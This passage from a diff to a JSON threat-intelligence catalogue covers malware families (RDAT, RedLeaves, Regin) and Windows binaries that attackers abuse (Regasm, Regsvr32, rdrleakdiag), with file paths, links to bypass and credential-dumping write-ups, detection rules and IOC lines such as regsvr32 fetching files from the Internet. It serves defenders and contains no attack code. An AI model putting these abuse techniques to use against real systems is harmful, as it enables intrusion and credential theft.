[proc_creation_win_csi_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_csi_execution.yml)[[rcsi.exe - LOLBAS Project](/references/dc02058a-7ed3-4253-a976-6f99b9e91406)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5233", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "c0f4b154-5dac-40e7-b6d0-eb111c1da58c", + "type": "similar" + } + ], + "uuid": "9a5cff11-6bad-407a-a53c-2562a56ac024", + "value": "rcsi" + }, + { + "description": "[RDAT](https://app.tidalcyber.com/software/567da30e-fd4d-4ec5-a308-bf08788f3bfb) is a backdoor used by the suspected Iranian threat group [OilRig](https://app.tidalcyber.com/groups/d01abdb1-0378-4654-aa38-1a4a292703e2). [RDAT](https://app.tidalcyber.com/software/567da30e-fd4d-4ec5-a308-bf08788f3bfb) was originally identified in 2017 and targeted companies in the telecommunications sector.[[Unit42 RDAT July 2020](https://app.tidalcyber.com/references/2929baa5-ead7-4936-ab67-c4742afc473c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0495", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "4b346d12-7f91-48d2-8f06-b26ffa0d825b", + "type": "similar" + } + ], + "uuid": "567da30e-fd4d-4ec5-a308-bf08788f3bfb", + "value": "RDAT" + }, + { + "description": "[RDFSNIFFER](https://app.tidalcyber.com/software/ca4e973c-da15-46a9-8f3a-0b1560c9a783) is a module loaded by [BOOSTWRITE](https://app.tidalcyber.com/software/74a73624-d53b-4c84-a14b-8ae964fd577c) which allows an attacker to monitor and tamper with legitimate connections made via an application designed to provide visibility and system management capabilities to remote IT techs.[[FireEye FIN7 Oct 2019](https://app.tidalcyber.com/references/df8886d1-fbd7-4c24-8ab1-6261923dee96)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0416", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4348c510-50fc-4448-ab8d-c8cededd19ff", + "type": "used-by" + }, + { + "dest-uuid": "065196de-d7e8-4888-acfb-b2134022ba1b", + "type": "similar" + } + ], + "uuid": "ca4e973c-da15-46a9-8f3a-0b1560c9a783", + "value": "RDFSNIFFER" + }, + { + "description": "RDP Recognizer is a tool that can be used to brute force RDP passwords and check for RDP vulnerabilities. U.S. authorities observed BianLian Ransomware Group actors downloading the tool during intrusions.[[U.S. CISA BianLian Ransomware May 2023](/references/aa52e826-f292-41f6-985d-0282230c8948)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5012", + "source": "Tidal Cyber", + "tags": [ + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "15787198-6c8b-4f79-bf50-258d55072fee", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + } + ], + "uuid": "22d9f7be-7447-4cce-90f0-67a13d4b6a82", + "value": "RDP Recognizer" + }, + { + "description": "[[rdrleakdiag.exe - LOLBAS Project](/references/1feff728-2230-4a45-bd64-6093f8b42646)]", + "meta": { + "id": "4a803f25-7a1f-4038-8cc1-2ff4d24ff94c", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "3b37c81a-9574-4ac3-a996-d4cfe1e3ddb1", + "type": "similar" + } + ], + "uuid": "d6302e6b-9ff5-4278-9d9d-98cbbffb5cc2", + "value": "rdrleakdiag.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Microsoft Windows resource leak diagnostic tool\n\n**Author:** John Dwyer\n\n**Paths:**\n* c:\\windows\\system32\\rdrleakdiag.exe\n* c:\\Windows\\SysWOW64\\rdrleakdiag.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1299071304805560321?s=21](https://twitter.com/0gtweet/status/1299071304805560321?s=21)\n* [https://www.pureid.io/dumping-abusing-windows-credentials-part-1/](https://www.pureid.io/dumping-abusing-windows-credentials-part-1/)\n* [https://github.com/LOLBAS-Project/LOLBAS/issues/84](https://github.com/LOLBAS-Project/LOLBAS/issues/84)\n\n**Detection:**\n* Sigma: [proc_creation_win_rdrleakdiag_process_dumping.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_rdrleakdiag_process_dumping.yml)\n* Elastic: [https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html](https://www.elastic.co/guide/en/security/current/potential-credential-access-via-windows-utilities.html)\n* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)[[rdrleakdiag.exe - LOLBAS Project](/references/1feff728-2230-4a45-bd64-6093f8b42646)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5147", + "source": "Tidal Cyber", + "tags": [ + "9fbc403c-bd2e-458a-a202-a65b8201e973", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "d6302e6b-9ff5-4278-9d9d-98cbbffb5cc2", + "type": "similar" + } + ], + "uuid": "3b37c81a-9574-4ac3-a996-d4cfe1e3ddb1", + "value": "rdrleakdiag" + }, + { + "description": "[Reaver](https://app.tidalcyber.com/software/ca544771-d43e-4747-80e5-cf0f4a4836f3) is a malware family that has been in the wild since at least late 2016. Reporting indicates victims have primarily been associated with the \"Five Poisons,\" which are movements the Chinese government considers dangerous. The type of malware is rare due to its final payload being in the form of [Control Panel](https://app.tidalcyber.com/technique/b5cc9ab3-6501-4c50-904e-1a25a4088125) items.[[Palo Alto Reaver Nov 2017](https://app.tidalcyber.com/references/69fbe527-2ec4-457b-81b1-2eda65eb8442)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0172", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "65341f30-bec6-4b1d-8abf-1a5620446c29", + "type": "similar" + } + ], + "uuid": "ca544771-d43e-4747-80e5-cf0f4a4836f3", + "value": "Reaver" + }, + { + "description": "Based on similarities in reported malware behavior and open source reporting, it is assessed that the malware named BUGJUICE by FireEye is likely the same as the malware RedLeaves. [[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)] [[Twitter Nick Carr APT10](https://app.tidalcyber.com/references/0f133f2c-3b02-4b3b-a960-ef6a7862cf8f)]", + "meta": { + "id": "5c7b379f-7d04-4904-8465-ae74c1da5e54" + }, + "related": [ + { + "dest-uuid": "5264c3ab-14e1-4ae1-854e-889ebde029b4", + "type": "similar" + } + ], + "uuid": "07310f3e-ca07-43f8-a5fd-f078bd0b1ae4", + "value": "BUGJUICE" + }, + { + "description": "[RedLeaves](https://app.tidalcyber.com/software/5264c3ab-14e1-4ae1-854e-889ebde029b4) is a malware family used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322). The code overlaps with [PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10) and may be based upon the open source tool Trochilus. [[PWC Cloud Hopper Technical Annex April 2017](https://app.tidalcyber.com/references/da6c8a72-c732-44d5-81ac-427898706eed)] [[FireEye APT10 April 2017](https://app.tidalcyber.com/references/2d494df8-83e3-45d2-b798-4c3bcf55f675)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0153", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "fb93231d-2ae4-45da-9dea-4c372a11f322", + "type": "used-by" + }, + { + "dest-uuid": "17b40f60-729f-4fe8-8aea-cc9ee44a95d5", + "type": "similar" + }, + { + "dest-uuid": "07310f3e-ca07-43f8-a5fd-f078bd0b1ae4", + "type": "similar" + } + ], + "uuid": "5264c3ab-14e1-4ae1-854e-889ebde029b4", + "value": "RedLeaves" + }, + { + "description": "", + "meta": { + "id": "4ba0a066-1b3c-4670-8f57-e84f5245a78b" + }, + "related": [ + { + "dest-uuid": "d796615c-fa3d-4afd-817a-1a3db8c73532", + "type": "similar" + } + ], + "uuid": "7d5f2e75-7ff0-44e4-b8a7-2d817c58ffe0", + "value": "reg.exe" + }, + { + "description": "[Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) is a Windows utility used to interact with the Windows Registry. It can be used at the command-line interface to query, add, modify, and remove information. [[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)]\n\nUtilities such as [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) are known to be used by persistent threats. [[Windows Commands JPCERT](https://app.tidalcyber.com/references/9d935f7f-bc2a-4d09-a51a-82074ffd7d77)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0075", + "source": "MITRE", + "tags": [ + "ec4a7c87-051b-4b7d-8acc-03696fe2113e", + "758c3085-2f79-40a8-ab95-f8a684737927", + "af5e9be5-b86e-47af-91dd-966a5e34a186", + "35e694ec-5133-46e3-b7e1-5831867c3b55", + "1dc8fd1e-0737-405a-98a1-111dd557f1b5", + "15787198-6c8b-4f79-bf50-258d55072fee", + "303a3675-4855-4323-b042-95bb1d907cca", + "8bf128ad-288b-41bc-904f-093f4fdde745", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "4ea1245f-3f35-5168-bd10-1fc49142fd4e", + "type": "used-by" + }, + { + "dest-uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", + "type": "used-by" + }, + { + "dest-uuid": "47ae4fb1-fc61-4e8e-9310-66dda706e1a2", + "type": "used-by" + }, + { + "dest-uuid": "a2add2a0-2b54-4623-a380-a9ad91f1f2dd", + "type": "used-by" + }, + { + "dest-uuid": "15ff1ce0-44f0-4f1d-a4ef-83444570e572", + "type": "used-by" + }, + { + "dest-uuid": "472080b0-e3d4-4546-9272-c4359fe856e1", + "type": "used-by" + }, + { + "dest-uuid": "d01abdb1-0378-4654-aa38-1a4a292703e2", + "type": "used-by" + }, + { + "dest-uuid": "021b3c71-6467-4e46-a413-8b726f066f2c", + "type": "used-by" + }, + { + "dest-uuid": "cde2d700-9ed1-46cf-9bce-07364fe8b24f", + "type": "similar" + }, + { + "dest-uuid": "7d5f2e75-7ff0-44e4-b8a7-2d817c58ffe0", + "type": "similar" + } + ], + "uuid": "d796615c-fa3d-4afd-817a-1a3db8c73532", + "value": "Reg" + }, + { + "description": "[[LOLBAS Regasm](/references/b6a3356f-72c2-4ec2-a276-2432eb691055)]", + "meta": { + "id": "9dab22f5-8405-44d2-8ebf-8c7ed07a75d0", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "1e892f4b-5398-44ac-aeb4-2e50f70c5716", + "type": "similar" + } + ], + "uuid": "39a11044-91eb-4631-9272-b29b46694271", + "value": "Regasm.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Part of .NET\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\regasm.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\regasm.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\regasm.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\regasm.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/](https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_regasm.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml)\n* Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml)\n* Splunk: [suspicious_regsvcs_regasm_activity.md](https://github.com/splunk/security_content/blob/bc93e670f5dcb24e96fbe3664d6bcad92df5acad/docs/_stories/suspicious_regsvcs_regasm_activity.md)\n* Splunk: [detect_regasm_with_network_connection.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regasm_with_network_connection.yml)\n* IOC: regasm.exe executing dll file[[LOLBAS Regasm](/references/b6a3356f-72c2-4ec2-a276-2432eb691055)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5148", + "source": "Tidal Cyber", + "tags": [ + "7d31d8f7-375b-4fb3-a631-51b42e58d95a", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "39a11044-91eb-4631-9272-b29b46694271", + "type": "similar" + } + ], + "uuid": "1e892f4b-5398-44ac-aeb4-2e50f70c5716", + "value": "Regasm" + }, + { + "description": "[RegDuke](https://app.tidalcyber.com/software/52dc08d8-82cc-46dc-91ae-383193d72963) is a first stage implant written in .NET and used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) since at least 2017. [RegDuke](https://app.tidalcyber.com/software/52dc08d8-82cc-46dc-91ae-383193d72963) has been used to control a compromised machine when control of other implants on the machine was lost.[[ESET Dukes October 2019](https://app.tidalcyber.com/references/fbc77b85-cc5a-4c65-956d-b8556974b4ef)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0511", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c3e48b9-4426-4271-a7af-c3dfad79f447", + "type": "used-by" + }, + { + "dest-uuid": "47124daf-44be-4530-9c63-038bc64318dd", + "type": "similar" + } + ], + "uuid": "52dc08d8-82cc-46dc-91ae-383193d72963", + "value": "RegDuke" + }, + { + "description": "[[Regedit.exe - LOLBAS Project](/references/86e47198-751b-4754-8741-6dd8f2960416)]", + "meta": { + "id": "ed13f106-17dd-4fdf-9f19-5ab62fed9a75", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "16cc6ff2-8804-4863-aede-40c4376e0af3", + "type": "similar" + } + ], + "uuid": "f230afe5-bf37-46ae-9f46-124ad37bb0e3", + "value": "Regedit.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to manipulate registry\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\regedit.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_regedit_import_keys_ads.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml)\n* IOC: regedit.exe reading and writing to alternate data stream\n* IOC: regedit.exe should normally not be executed by end-users[[Regedit.exe - LOLBAS Project](/references/86e47198-751b-4754-8741-6dd8f2960416)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5149", + "source": "Tidal Cyber", + "tags": [ + "36affa3d-c949-4e1b-8667-299490580dd5", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "f230afe5-bf37-46ae-9f46-124ad37bb0e3", + "type": "similar" + } + ], + "uuid": "16cc6ff2-8804-4863-aede-40c4376e0af3", + "value": "Regedit" + }, + { + "description": "[Regin](https://app.tidalcyber.com/software/e88bf527-bb9c-45c3-b86b-04a07dcd91fd) is a malware platform that has targeted victims in a range of industries, including telecom, government, and financial institutions. Some [Regin](https://app.tidalcyber.com/software/e88bf527-bb9c-45c3-b86b-04a07dcd91fd) timestamps date back to 2003. [[Kaspersky Regin](https://app.tidalcyber.com/references/1b521b76-5b8f-4bd9-b312-7c795fc97898)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0019", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4c59cce8-cb48-4141-b9f1-f646edfaadb0", + "type": "similar" + } + ], + "uuid": "e88bf527-bb9c-45c3-b86b-04a07dcd91fd", + "value": "Regin" + }, + { + "description": "[[Regini.exe - LOLBAS Project](/references/db2573d2-6ecd-4c5a-b038-2f799f9723ae)]", + "meta": { + "id": "9ccfddfb-3d11-4727-8e78-7fe09dae53e9", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "92457f9e-c2e6-4d61-b927-0d8ff0f6d617", + "type": "similar" + } + ], + "uuid": "16554d65-2a29-4401-9930-cad7f681a7e3", + "value": "Regini.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to manipulate the registry\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\regini.exe\n* C:\\Windows\\SysWOW64\\regini.exe\n\n**Resources:**\n* [https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)\n\n**Detection:**\n* Sigma: [proc_creation_win_regini_ads.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_ads.yml)\n* Sigma: [proc_creation_win_regini_execution.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regini_execution.yml)\n* IOC: regini.exe reading from ADS[[Regini.exe - LOLBAS Project](/references/db2573d2-6ecd-4c5a-b038-2f799f9723ae)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5150", + "source": "Tidal Cyber", + "tags": [ + "288c6e19-cf6c-451a-aff3-547f371ff4ad", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "16554d65-2a29-4401-9930-cad7f681a7e3", + "type": "similar" + } + ], + "uuid": "92457f9e-c2e6-4d61-b927-0d8ff0f6d617", + "value": "Regini" + }, + { + "description": "[[Register-cimprovider.exe - LOLBAS Project](/references/d445d016-c4f1-45c8-929d-913867275417)]", + "meta": { + "id": "e6fc20e7-7068-48a1-8ae4-a1b98ae67115", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "c80bac89-6b63-4860-9f66-260976a184e8", + "type": "similar" + } + ], + "uuid": "17ba6fd7-2072-4ef8-955a-87ccea4f9ec9", + "value": "Register-cimprovider.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used to register new wmi providers\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\Register-cimprovider.exe\n* C:\\Windows\\SysWOW64\\Register-cimprovider.exe\n\n**Resources:**\n* [https://twitter.com/PhilipTsukerman/status/992021361106268161](https://twitter.com/PhilipTsukerman/status/992021361106268161)\n\n**Detection:**\n* Sigma: [proc_creation_win_susp_register_cimprovider.yml](https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml)\n* IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious[[Register-cimprovider.exe - LOLBAS Project](/references/d445d016-c4f1-45c8-929d-913867275417)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5151", + "source": "Tidal Cyber", + "tags": [ + "d379a1fb-1028-4986-ae6c-eb8cc068aa68", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "17ba6fd7-2072-4ef8-955a-87ccea4f9ec9", + "type": "similar" + } + ], + "uuid": "c80bac89-6b63-4860-9f66-260976a184e8", + "value": "Register-cimprovider" + }, + { + "description": "[[LOLBAS Regsvcs](/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]", + "meta": { + "id": "8dc52fcf-9e7a-420b-bec5-2cd511c6bad7", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "271dd92b-76ee-4a00-ba41-343c32fc084e", + "type": "similar" + } + ], + "uuid": "784ed6e9-5db4-4aeb-ac49-a5e402062a89", + "value": "Regsvcs.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* c:\\Windows\\Microsoft.NET\\Framework\\v*\\regsvcs.exe\n* c:\\Windows\\Microsoft.NET\\Framework64\\v*\\regsvcs.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/](https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_regasm.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_regasm.yml)\n* Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml)\n* Splunk: [detect_regsvcs_with_network_connection.yml](https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml)[[LOLBAS Regsvcs](/references/3f669f4c-0b94-4b78-ad3e-fd62f7600902)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5152", + "source": "Tidal Cyber", + "tags": [ + "141e4dce-00be-4bd7-9f81-6202939f0359", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "784ed6e9-5db4-4aeb-ac49-a5e402062a89", + "type": "similar" + } + ], + "uuid": "271dd92b-76ee-4a00-ba41-343c32fc084e", + "value": "Regsvcs" + }, + { + "description": "[[LOLBAS Regsvr32](/references/8e32abef-534e-475a-baad-946b6ec681c1)]", + "meta": { + "id": "dbf326f4-37e2-4866-8b44-a65e392af5c3", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "533d2c42-45a7-456e-af75-b61e2aff98a7", + "type": "similar" + } + ], + "uuid": "400f3e02-f6b9-405a-8cd0-12dcf81cf4e4", + "value": "Regsvr32.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Used by Windows to register dlls\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\regsvr32.exe\n* C:\\Windows\\SysWOW64\\regsvr32.exe\n\n**Resources:**\n* [https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/](https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/)\n* [https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/](https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/)\n* [https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md)\n\n**Detection:**\n* Sigma: [proc_creation_win_regsvr32_susp_parent.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_parent.yml)\n* Sigma: [proc_creation_win_regsvr32_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml)\n* Sigma: [proc_creation_win_regsvr32_susp_exec_path_1.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_susp_exec_path_1.yml)\n* Sigma: [proc_creation_win_regsvr32_network_pattern.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_regsvr32_network_pattern.yml)\n* Sigma: [net_connection_win_regsvr32_network_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/network_connection/net_connection_win_regsvr32_network_activity.yml)\n* Sigma: [dns_query_win_regsvr32_network_activity.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/dns_query/dns_query_win_regsvr32_network_activity.yml)\n* Sigma: [proc_creation_win_regsvr32_flags_anomaly.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml)\n* Sigma: [file_event_win_net_cli_artefact.yml](https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml)\n* Splunk: [detect_regsvr32_application_control_bypass.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml)\n* Elastic: [defense_evasion_suspicious_managedcode_host_process.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml)\n* Elastic: [execution_register_server_program_connecting_to_the_internet.toml](https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml)\n* IOC: regsvr32.exe retrieving files from Internet\n* 